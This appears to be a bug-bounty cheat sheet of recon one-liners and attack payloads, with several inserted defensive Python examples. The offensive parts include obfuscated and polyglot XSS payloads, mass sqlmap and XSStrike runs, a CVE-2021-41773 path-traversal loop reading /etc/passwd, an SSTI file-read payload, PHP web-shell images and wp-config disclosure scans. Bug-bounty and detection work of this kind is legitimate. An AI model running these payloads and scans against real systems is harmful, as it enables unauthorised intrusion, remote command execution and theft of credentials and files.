- Automated Subdomain Monitoring
- Burp Suite Extensions
- JavaScript
- Enumerate Subdomains, Web Servers and API Endpoints
- Find CNAME Records
- Find hidden Parameters in JavaScript Files
- Find JavaScript Files with gau and httpx
- Find Open Redirects
- Find Secrets in JavaScript Files
- Find Subdomains based on Certificates
- Find SQL-Injection (SQLi) at Scale
- Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
- Find Cross-Site Scripting (XSS) at Scale
- Fingerprinting with Shodan and Nuclei
- Hunting Checklist
- Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)
- Server-Side Template Injection (SSTI) at Scale
- Wayback Machine
- Web Shell / Malicious Images
- Wordpress Configuration Disclosure
- Cross-Site Scripting (XSS)
Name | Description | URL |
---|---|---|
Bug Crowd | Bug Bounty Platform | https://www.bugcrowd.com |
CrowdStream | CrowdStream is a showcase of accepted and disclosed submissions on participating programs. | https://bugcrowd.com/crowdstream?filter=disclosures |
disclose.io | We're here to make vulnerability disclosure safe, simple, and standardized for everyone. | https://disclose.io |
HackerOne | Bug Bounty Platform | https://www.hackerone.com |
Hacktivity | See the latest hacker activity on HackerOne | https://hackerone.com/hacktivity |
InfoSecHub | n/a | https://linksshare.io |
Intigriti | Bug Bounty Platform | https://www.intigriti.com |
Automated Subdomain Monitoring
```
$ go install -v github.com/hakluke/haktrails@latest
$ go install -v github.com/tomnomnom/anew@latest
$ go install -v github.com/projectdiscovery/notify/cmd/notify@latest
$ vi ~/.config/haktools/haktrails-config.yml
```
```yaml
securitytrails:
  key: <API_KEY>
```
```
$ vi ~/.config/notify/provider-config.yaml
```
```yaml
slack:
  - id: "slack"
    slack_channel: "recon"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"

  - id: "vulns"
    slack_channel: "vulns"
    slack_username: "test"
    slack_format: "{{data}}"
    slack_webhook_url: "https://hooks.slack.com/services/XXXXXX"

discord:
  - id: "crawl"
    discord_channel: "crawl"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"

  - id: "subs"
    discord_channel: "subs"
    discord_username: "test"
    discord_format: "{{data}}"
    discord_webhook_url: "https://discord.com/api/webhooks/XXXXXXXX"

telegram:
  - id: "tel"
    telegram_api_key: "XXXXXXXXXXXX"
    telegram_chat_id: "XXXXXXXX"
    telegram_format: "{{data}}"
    telegram_parsemode: "Markdown" # None/Markdown/MarkdownV2/HTML (https://core.telegram.org/bots/api#formatting-options)

pushover:
  - id: "push"
    pushover_user_key: "XXXX"
    pushover_api_token: "YYYY"
    pushover_format: "{{data}}"
    pushover_devices:
      - "iphone"

smtp:
  - id: email
    smtp_server: mail.example.com
    smtp_username: test@example.com
    smtp_password: password
    from_address: from@email.com
    smtp_cc:
      - to@email.com
    smtp_format: "{{data}}"
    subject: "Email subject"
    smtp_html: false
    smtp_disable_starttls: false

googlechat:
  - id: "gc"
    key: "XXXXXXXX"
    token: "XXXXXX"
    space: "XXXXXX"
    google_chat_format: "{{data}}"

teams:
  - id: "recon"
    teams_webhook_url: "https://<domain>.webhook.office.com/webhookb2/xx@xx/IncomingWebhook/xx"
    teams_format: "{{data}}"

custom:
  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{{data}}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX

  - id: webhookJson
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_format: '{"text":{{dataJsonString}} }'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX

  - id: webhook
    custom_webhook_url: http://host/api/webhook
    custom_method: GET
    custom_sprig: '{"text":"{{ .url }}"}'
    custom_headers:
      Content-Type: application/json
      X-Api-Key: XXXXX
```
```
$ while :; do echo <DOMAIN> | haktrails subdomain | anew subdomains.txt; sleep 86400; done | notify
```
Burp Suite Extensions
- JS Link Finder
- Upload Scanner
- Turbo Intruder
- HTTP Request Smuggler
- Auth Analyzer
JavaScript
```javascript
![] // false
!![] // true
[][[]] // undefined
+[![]] // NaN
+[] // 0
+!+[] // 1
!+[]+!+[] // 2
[] // Array
+[] // Number
[]+[] // String
![] // Boolean
[]["filter"] // Function
[]["filter"]["constructor"]( <CODE> )() // eval
[]["filter"]["constructor"]("<FOOBAR>")() // window
```
```html
<img src onerror="(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[]) [+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]++[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]]">
```
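From the defender's side, the useful property of this encoding is that it needs only six characters. The following added example (my own, not from the original page) scores URL-decoded query parameter values by how much of them is drawn from that alphabet, so payloads of this shape can be flagged in request logs or a WAF rule; the sample query string is constructed, with the page's primitives spelling "alert".

```python
from urllib.parse import parse_qsl, urlencode

# JSFuck needs nothing but these six characters; every primitive listed above is built from them.
JSFUCK_ALPHABET = set("[]()!+")

def jsfuck_score(s: str) -> float:
    """Share of non-whitespace characters that belong to the JSFuck alphabet."""
    body = [c for c in s if not c.isspace()]
    if not body:
        return 0.0
    return sum(c in JSFUCK_ALPHABET for c in body) / len(body)

def looks_like_jsfuck(s: str, min_len: int = 40, min_score: float = 0.9) -> bool:
    """Long, almost entirely [ ] ( ) ! +, and containing the [] seed the encoding starts from."""
    body = "".join(c for c in s if not c.isspace())
    return len(body) >= min_len and "[]" in body and jsfuck_score(body) >= min_score

def flag_jsfuck_params(query: str) -> list:
    """Names of the query parameters whose URL-decoded value looks JSFuck-encoded."""
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if looks_like_jsfuck(value)]

# Constructed sample: 'alert' spelled with the page's primitives, carried in a query string.
# urlencode turns '+' into %2B so parse_qsl gives the payload back unchanged.
JSFUCK_ALERT = ("(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]"
                "+(!![]+[])[+!+[]]+(!![]+[])[+[]]")
SAMPLE_QUERY = urlencode({"q": "hello world", "cb": JSFUCK_ALERT})
```

Thresholds are deliberately conservative: ordinary minified JavaScript has a far lower share of these six characters, so false positives come mainly from very short values, which `min_len` filters out.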
Enumerate Subdomains, Web Servers and API Endpoints
```
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; for i in $(cat <DOMAIN>_httpx.txt); do DOMAIN=$(echo $i | /home/<USERNAME>/go/bin/unfurl format %d); ffuf -u $i/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt -o ${DOMAIN}_ffuf.txt; done
```
Find CNAME Records
```
$ for host in $(cat <FILE>.txt); do dig "$host" | grep CNAME; done
```
Find hidden Parameters in JavaScript Files
```
$ assetfinder <DOMAIN> | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
```
Find JavaScript Files with gau and httpx
```
$ echo http://<DOMAIN> | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
```
Find Open Redirects
```
$ echo "http://<RHOST>" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));"
```
Find Secrets in JavaScript Files
```
$ subfinder -d <DOMAIN> -silent | /home/<USERNAME>/go/bin/httpx -silent -o <DOMAIN>_httpx.txt; cat <DOMAIN>_httpx.txt | nuclei -t /home/<USERNAME>/opt/03_web_application_analysis/nuclei-templates/exposures/tokens -o token-expose.txt
```
Find Subdomains based on Certificates
```
$ curl -s 'https://crt.sh/?q=<DOMAIN>&output=json' | jq -r '.[].name_value' | sort -u
```
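The subdomain monitoring loop earlier on this page and this crt.sh query both reduce to a set difference: names seen now minus names already known. The added example below (my own, not from the page) does that diff in Python over a constructed sample of crt.sh's JSON, splitting the newline-separated name_value field, dropping wildcard prefixes and ignoring names outside the target domain, so a defender can compare certificate-transparency data against an asset inventory.

```python
import json

# Constructed sample of crt.sh JSON output (the name_value field is what the shell command reads).
CRTSH_SAMPLE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com", "not_after": "2024-09-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.staging.example.com", "not_after": "2024-09-01T00:00:00"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "Old-Vpn.example.com\nmail.example.org", "not_after": "2022-01-01T00:00:00"},
])

def names_from_crtsh(raw_json: str, domain: str) -> set:
    """Unique hostnames under `domain` found in crt.sh output.

    name_value can hold several names separated by newlines; a leading '*.' is
    stripped so a wildcard certificate still yields the zone it covers.
    """
    domain = domain.lower()
    names = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return names

def unknown_names(found: set, inventory: set) -> set:
    """Names present in CT logs but missing from the asset inventory (case-insensitive)."""
    return found - {h.lower() for h in inventory}
```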
Find SQL-Injection (SQLi) at Scale
```
$ subfinder -d <DOMAIN> -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a <URLS_FILE>
$ cat <URLS_FILE> | gf sqli | tee -a <SQLI_FILE>
$ while read line; do sqlmap -u "$line" --parse-errors --current-db --invalid-logical --invalid-bignum --invalid-string --risk 3; done < <SQLI_FILE>
```
Find basic SQL-Injection (SQLi), Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI) Vulnerabilities with Magic Payload
```
'"><svg/onload=alert()>{{7*7}}
```
Find Cross-Site Scripting (XSS) at Scale
```
$ echo <DOMAIN> | gau | while read url; do python3 xsstrike.py -u $url --crawl -l 4 -d 5; done
$ echo <DOMAIN> | katana | while read url; do python3 xsstrike.py -u $url --crawl -l 4; done
$ subfinder -d <DOMAIN> -all -silent | httpx -silent | katana -silent | Gxss -c 100 | dalfox pipe --skip-bav --skip-mining-all --skip-grepping
```
Fingerprinting with Shodan and Nuclei
```
$ shodan domain <DOMAIN> | awk '{print $3}' | httpx -silent | nuclei -t /PATH/TO/TEMPLATES/nuclei-templates/
```
Hunting Checklist
- Find Subdomains
- Check CNAME Records of those subdomains and check for Subdomain Takeover
- Use WaybackUrls for URLs
- Use MassScan for Port Scanning
- Do Github recon
- Check for CORS Misconfiguration
- Check for Email Header Injection on Password Reset Function
- Check for SMTP and HOST Header Injection
- Check for IFRAMEs (Clickjacking)
- Check for Improper Access Control and Parameter Tampering
- Check Burp History for finding endpoints
- Use Arjun for finding hidden endpoints
- Check for Cross-Site Request Forgery (CSRF)
- Check for Server-Side Request Forgery (SSRF) Parameters
- Check for Cross-Site Scripting (XSS) and Server-Side Template Injection (SSTI)
- Check Cryptography in Reset Password Token
- Check for Unicode Injection in Email Parameters
- Check for Bypassing Rate Limits with the headers X-Originating-IP: IP, X-Forwarded-For: IP, X-Remote-IP: IP, X-Remote-Addr: IP, X-Client-IP: IP, X-Forwarded-Host: IP
- Perform Directory Busting
- Check for HTTP Request Smuggling
- Check for Open Redirect through WaybackUrls
- Check for Social-Signon Bypass
- Check for state parameter in Social Sign-In and check whether it is possible to cause Denial of Service (DoS) using Multiple Cookie Injection
- Check for File Upload: CSRF, XSS, SSRF, RCE, LFI, XXE
- Check for Buffer Overflow
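The header list in the rate-limit item works only against a limiter that trusts client-supplied headers. The added example below (my own, not from the page) keys the limit on the TCP peer address and consults X-Forwarded-For only when the peer is a proxy in an assumed trusted range (10.0.0.0/24, a constructed value), so none of those six headers changes the bucket a direct client's request lands in.

```python
import ipaddress
from collections import defaultdict

# The headers the checklist names; any client can set them, so by themselves they carry no trust.
SPOOFABLE_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Remote-IP",
                     "X-Remote-Addr", "X-Client-IP", "X-Forwarded-Host")

# Assumed deployment (constructed): the only reverse proxy in front of the app lives in this range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]

def client_ip(remote_addr: str, headers: dict) -> str:
    """Address to key the rate limit on.

    X-Forwarded-For is consulted only when the TCP peer is a trusted proxy, and
    then only its rightmost entry, which is the one that proxy appended. Every
    other header, and every header sent by a direct client, is ignored.
    """
    peer = ipaddress.ip_address(remote_addr)
    if not any(peer in net for net in TRUSTED_PROXIES):
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    try:
        return str(ipaddress.ip_address(hops[-1])) if hops else remote_addr
    except ValueError:                  # malformed entry: fall back to the proxy's own address
        return remote_addr

class RateLimiter:
    """Fixed-window counter per client key, allowing `limit` requests per window."""
    def __init__(self, limit: int):
        self.limit = limit
        self.counts = defaultdict(int)

    def allow(self, remote_addr: str, headers: dict) -> bool:
        key = client_ip(remote_addr, headers)
        self.counts[key] += 1
        return self.counts[key] <= self.limit
```

The same rule applies to logging and to IP allowlists: derive the client address from the connection and from a proxy you control, never from whatever header the request happens to carry.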
Path Traversal Zero-Day in Apache HTTP Server (CVE-2021-41773)
```
$ cat <FILE>.txt | while read host; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
```
Server-Side Template Injection (SSTI) at Scale
```
$ echo "<DOMAIN>" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/hostname').read()}}" | parallel -j50 -q curl -g | grep "root:x"
```
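The request above works because the affected version normalised the path before percent-decoding, so `%2e` was not recognised as a dot segment. The added example below (mine, not from the page) does the two steps in the safe order, decoding until the string is stable and then walking the segments with a depth counter, and runs that check over constructed Apache access-log lines to pick out traversal attempts, including a double-encoded one.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1257 "-" "curl/7.68.0"
198.51.100.3 - - [06/Oct/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Oct/2021:10:00:03 +0000] "GET /icons/..%252F..%252Fetc/passwd HTTP/1.1" 403 199 "-" "curl/7.68.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def decode_fully(path: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %2e and %252e both become '.'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_docroot(raw_path: str) -> bool:
    """True if the path, decoded *before* dot-segment handling, climbs above the root.

    A depth counter catches the climb even when later segments would bring the
    path back inside the root.
    """
    decoded = decode_fully(raw_path.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for seg in decoded.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def traversal_hits(log_text: str) -> list:
    """(client_ip, raw_path) for every logged request whose path escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_docroot(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits
```

The third sample line was refused with a 403, and it is still reported: for detection the attempt matters, not the outcome.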
Wayback Machine
- Access https://web.archive.org/
- Type in the desired domain
- Switch to the URL tab https://web.archive.org/web/*/https://*
- Apply the filter %40
Web Shell / Malicious Images
```
$ echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > <FILE>.jpg
$ echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > <FILE>.png
```
Wordpress Configuration Disclosure
```
$ subfinder -silent -d <DOMAIN> | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60
```
Cross-Site Scripting (XSS)
Note that the following HTML tags need to be closed before an XSS payload placed inside them will execute.
```html
<!--
<title>
<textarea>
<style>
<noscript>
<xmp>
<template>
<noembed>
```
```html
--></title></textarea></style></noscript></script></xmp></template></noembed><svg/onload=alert()>
```